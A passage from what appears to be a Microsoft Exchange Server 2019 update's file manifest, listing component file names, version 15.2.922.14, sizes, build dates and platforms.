\nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.922.14| 23,944| 25-Sep-21| 4:37| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.922.14| 101,752| 25-Sep-21| 3:47| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.922.14| 544,144| 25-Sep-21| 4:31| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.922.14| 305,032| 25-Sep-21| 4:34| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.922.14| 273,808| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.922.14| 418,696| 25-Sep-21| 4:36| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.922.14| 275,832| 25-Sep-21| 4:38| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.922.14| 70,520| 25-Sep-21| 4:40| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.922.14| 7,874,440| 25-Sep-21| 3:04| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.922.14| 1,502,088| 25-Sep-21| 4:34| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.922.14| 71,568| 25-Sep-21| 4:35| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.922.14| 1,301,368| 25-Sep-21| 4:32| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.922.14| 1,876,856| 25-Sep-21| 4:39| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.922.14| 5,366,656| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.922.14| 36,224| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.922.14| 117,648| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.922.14| 209,784| 25-Sep-21| 4:34| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.922.14| 79,736| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.922.14| 17,296| 25-Sep-21| 2:10| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.922.14| 156,048| 25-Sep-21| 4:00| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.922.14| 65,936| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.922.14| 30,592| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.922.14| 58,248| 25-Sep-21| 3:52| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.922.14| 29,576| 25-Sep-21| 4:01| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.922.14| 175,504| 25-Sep-21| 4:00| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.922.14| 28,560| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.922.14| 75,128| 25-Sep-21| 4:01| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.922.14| 207,224| 25-Sep-21| 4:01| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.922.14| 440,712| 25-Sep-21| 3:57| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.922.14| 83,320| 25-Sep-21| 4:02| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.922.14| 35,208| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.922.14| 53,136| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.922.14| 96,656| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.migration.dll| 15.2.922.14| 1,110,416| 25-Sep-21| 4:09| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.922.14| 14,736| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.2.922.14| 135,568| 25-Sep-21| 3:51| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.922.14| 5,065,616| 25-Sep-21| 5:19| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.922.14| 19,832| 25-Sep-21| 2:53| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.922.14| 68,472| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.net.dll| 15.2.922.14| 5,086,072| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.922.14| 265,608| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.922.14| 37,768| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.922.14| 14,224| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.922.14| 549,760| 25-Sep-21| 5:09| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.922.14| 22,928| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.922.14| 106,360| 25-Sep-21| 3:47| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.922.14| 291,720| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.922.14| 17,288| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.922.14| 277,888| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.odata.dll| 15.2.922.14| 2,993,528| 25-Sep-21| 5:05| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.922.14| 91,024| 25-Sep-21| 3:16| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.922.14| 101,752| 25-Sep-21| 3:43| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.922.14| 38,272| 25-Sep-21| 3:43| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.922.14| 45,448| 25-Sep-21| 3:46| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.922.14| 58,232| 25-Sep-21| 3:41| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.922.14| 147,344| 25-Sep-21| 3:37| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.922.14| 26,512| 25-Sep-21| 3:42| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.922.14| 184,184| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.922.14| 26,488| 25-Sep-21| 3:36| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.922.14| 38,280| 25-Sep-21| 3:45| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.922.14| 55,680| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.922.14| 147,328| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.922.14| 191,864| 25-Sep-21| 3:42| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.922.14| 33,672| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.922.14| 28,032| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.922.14| 32,648| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.922.14| 15,224| 25-Sep-21| 3:48| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.922.14| 17,296| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.922.14| 17,296| 25-Sep-21| 2:12| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.922.14| 106,896| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.922.14| 106,896| 25-Sep-21| 3:39| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.922.14| 24,960| 25-Sep-21| 3:36| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.922.14| 24,960| 25-Sep-21| 3:36| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.922.14| 42,896| 25-Sep-21| 2:33| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.922.14| 264,584| 25-Sep-21| 3:36| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.922.14| 264,584| 25-Sep-21| 3:36| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.922.14| 358,264| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.922.14| 4,167,056| 25-Sep-21| 4:42| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.922.14| 308,600| 25-Sep-21| 4:44| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.922.14| 41,360| 25-Sep-21| 4:43| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.922.14| 30,584| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.922.14| 137,080| 25-Sep-21| 3:52| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.922.14| 441,744| 25-Sep-21| 3:50| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.922.14| 14,216| 25-Sep-21| 2:10| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.922.14| 224,648| 25-Sep-21| 4:34| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.922.14| 105,872| 25-Sep-21| 4:31| x86 \nMicrosoft.exchange.pst.dll| 15.2.922.14| 168,848| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.922.14| 168,848| 25-Sep-21| 2:09| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.922.14| 259,472| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.922.14| 72,064| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.922.14| 215,928| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.922.14| 106,896| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.922.14| 425,856| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.922.14| 70,520| 25-Sep-21| 3:46| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.922.14| 46,456| 25-Sep-21| 4:07| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.922.14| 215,952| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.query.core.dll| 15.2.922.14| 168,848| 25-Sep-21| 3:50| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.922.14| 343,432| 25-Sep-21| 4:08| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.922.14| 174,480| 25-Sep-21| 4:09| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.922.14| 95,096| 25-Sep-21| 4:04| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.922.14| 127,352| 25-Sep-21| 3:55| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.922.14| 63,376| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.922.14| 36,728| 25-Sep-21| 3:16| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.922.14| 17,792| 25-Sep-21| 2:28| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.922.14| 9,666,952| 25-Sep-21| 4:03| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.922.14| #########| 25-Sep-21| 2:33| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.922.14| 36,728| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.922.14| 97,664| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.922.14| 28,544| 25-Sep-21| 2:33| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.922.14| 72,056| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.922.14| 15,736| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.922.14| 13,176| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.922.14| 59,280| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.rpc.dll| 15.2.922.14| 1,690,512| 25-Sep-21| 2:33| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.922.14| 209,792| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.922.14| 60,296| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.922.14| 518,024| 25-Sep-21| 3:37| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.922.14| 161,168| 25-Sep-21| 2:54| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.922.14| 724,352| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.922.14| 243,064| 25-Sep-21| 3:40| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.922.14| 20,872| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.922.14| 35,208| 25-Sep-21| 4:33| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.922.14| 42,360| 25-Sep-21| 3:42| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.922.14| 56,208| 25-Sep-21| 4:31| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.922.14| 27,536| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.922.14| 130,424| 25-Sep-21| 2:40| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.922.14| 14,720| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.922.14| 20,352| 25-Sep-21| 3:47| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.922.14| 21,384| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.922.14| 267,656| 25-Sep-21| 2:10| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.922.14| 110,984| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.922.14| 112,512| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.922.14| 622,480| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.922.14| 185,224| 25-Sep-21| 4:12| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.922.14| 12,176| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.922.14| 19,336| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.search.core.dll| 15.2.922.14| 211,856| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.922.14| 17,808| 25-Sep-21| 4:14| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.922.14| 97,680| 25-Sep-21| 3:43| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.922.14| 16,768| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.922.14| 436,600| 25-Sep-21| 3:41| x86 \nMicrosoft.exchange.search.files.dll| 15.2.922.14| 274,320| 25-Sep-21| 3:50| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.922.14| 24,976| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.922.14| 218,000| 25-Sep-21| 3:38| x86 \nMicrosoft.exchange.search.service.exe| 15.2.922.14| 26,504| 25-Sep-21| 3:45| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.2.922.14| 221,048| 25-Sep-21| 3:36| x86 \nMicrosoft.exchange.security.dll| 15.2.922.14| 1,559,928| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.922.14| 19,832| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.922.14| 28,552| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.922.14| 225,168| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.922.14| 5,151,120| 25-Sep-21| 2:53| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.922.14| 214,920| 25-Sep-21| 3:57| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.922.14| 115,576| 25-Sep-21| 3:52| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.922.14| 82,824| 25-Sep-21| 3:03| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.922.14| 80,784| 25-Sep-21| 2:10| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.922.14| 66,424| 25-Sep-21| 3:41| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.922.14| 81,296| 25-Sep-21| 3:54| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.922.14| 211,856| 25-Sep-21| 3:45| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.922.14| 1,341,328| 25-Sep-21| 3:48| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.922.14| 511,888| 25-Sep-21| 3:56| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.922.14| 47,496| 25-Sep-21| 3:45| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.922.14| 873,872| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.922.14| 1,352,568| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.922.14| 30,592| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.922.14| 130,432| 25-Sep-21| 4:01| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.922.14| 1,018,768| 25-Sep-21| 3:43| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.922.14| 111,480| 25-Sep-21| 3:51| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.922.14| 34,696| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.922.14| 19,344| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.922.14| 14,728| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.922.14| 60,808| 25-Sep-21| 3:45| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.922.14| 50,576| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.922.14| 14,208| 25-Sep-21| 2:10| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.922.14| 14,200| 25-Sep-21| 2:15| x64 \nMicrosoft.exchange.services.common.dll| 15.2.922.14| 74,112| 25-Sep-21| 3:56| x86 \nMicrosoft.exchange.services.dll| 15.2.922.14| 8,481,160| 25-Sep-21| 4:49| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.922.14| 30,096| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.922.14| 633,720| 25-Sep-21| 4:59| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.922.14| 1,651,088| 25-Sep-21| 4:52| x86 \nMicrosoft.exchange.services.json.dll| 15.2.922.14| 296,328| 25-Sep-21| 4:56| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.922.14| 43,400| 25-Sep-21| 4:50| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.922.14| 233,336| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.922.14| 178,560| 25-Sep-21| 4:57| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.922.14| 348,536| 25-Sep-21| 4:54| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.922.14| 56,720| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.922.14| 93,064| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.922.14| 296,312| 25-Sep-21| 4:46| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.922.14| 35,720| 25-Sep-21| 4:34| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.922.14| 27,016| 25-Sep-21| 4:48| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.922.14| 114,568| 25-Sep-21| 4:49| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.922.14| 53,624| 25-Sep-21| 4:32| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.922.14| 75,128| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.922.14| 142,712| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.922.14| 24,952| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.922.14| 15,224| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.922.14| 58,760| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.922.14| 27,024| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.922.14| 46,976| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.sqm.dll| 15.2.922.14| 46,968| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.store.service.exe| 15.2.922.14| 28,032| 25-Sep-21| 4:03| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.922.14| 26,496| 25-Sep-21| 4:01| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.922.14| 13,688| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.922.14| 31,632| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.922.14| 1,205,128| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.922.14| 158,584| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.922.14| 628,104| 25-Sep-21| 4:11| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.922.14| 13,200| 25-Sep-21| 2:15| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.922.14| 16,256| 25-Sep-21| 4:33| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.922.14| 13,192| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.922.14| 221,568| 25-Sep-21| 2:40| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.922.14| 13,712| 25-Sep-21| 2:10| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.922.14| 29,064| 25-Sep-21| 3:54| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.922.14| 138,616| 25-Sep-21| 3:52| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.922.14| 21,880| 25-Sep-21| 2:42| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.922.14| 40,328| 25-Sep-21| 3:55| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.922.14| 22,912| 25-Sep-21| 3:57| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.922.14| 21,392| 25-Sep-21| 3:50| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.922.14| 212,864| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.922.14| 98,688| 25-Sep-21| 3:57| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.922.14| 22,920| 25-Sep-21| 3:52| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.922.14| 169,336| 25-Sep-21| 4:10| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.922.14| 18,320| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.922.14| 20,872| 25-Sep-21| 3:24| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.922.14| 31,624| 25-Sep-21| 3:54| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.922.14| 46,968| 25-Sep-21| 3:56| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.922.14| 30,096| 25-Sep-21| 3:51| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.922.14| 53,112| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.922.14| 44,944| 25-Sep-21| 3:50| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.922.14| 18,296| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.922.14| 46,480| 25-Sep-21| 4:00| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.922.14| 46,456| 25-Sep-21| 3:55| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.922.14| 28,032| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.922.14| 457,104| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.922.14| 18,296| 25-Sep-21| 3:38| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.922.14| 30,592| 25-Sep-21| 2:35| x86 \nMicrosoft.exchange.transport.dll| 15.2.922.14| 4,186,512| 25-Sep-21| 3:48| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.922.14| 182,136| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.922.14| 121,720| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.922.14| 403,832| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.922.14| 14,728| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.922.14| 90,000| 25-Sep-21| 2:35| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.922.14| 88,960| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.922.14| 68,472| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.922.14| 63,376| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.922.14| 430,456| 25-Sep-21| 5:22| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.922.14| 122,256| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.922.14| 17,784| 25-Sep-21| 3:37| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.922.14| 29,048| 25-Sep-21| 3:40| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.922.14| 60,792| 25-Sep-21| 3:41| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.922.14| 50,056| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.922.14| 33,144| 25-Sep-21| 3:37| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.922.14| 113,016| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.922.14| 18,312| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.922.14| 52,088| 25-Sep-21| 3:36| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.922.14| 675,216| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.922.14| 23,952| 25-Sep-21| 3:51| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.922.14| 17,792| 25-Sep-21| 4:08| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.922.14| 487,312| 25-Sep-21| 4:05| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:13| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.922.14| 306,048| 25-Sep-21| 4:09| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.922.14| 15,760| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.922.14| 46,480| 25-Sep-21| 4:07| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.922.14| 1,044,368| 25-Sep-21| 4:08| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 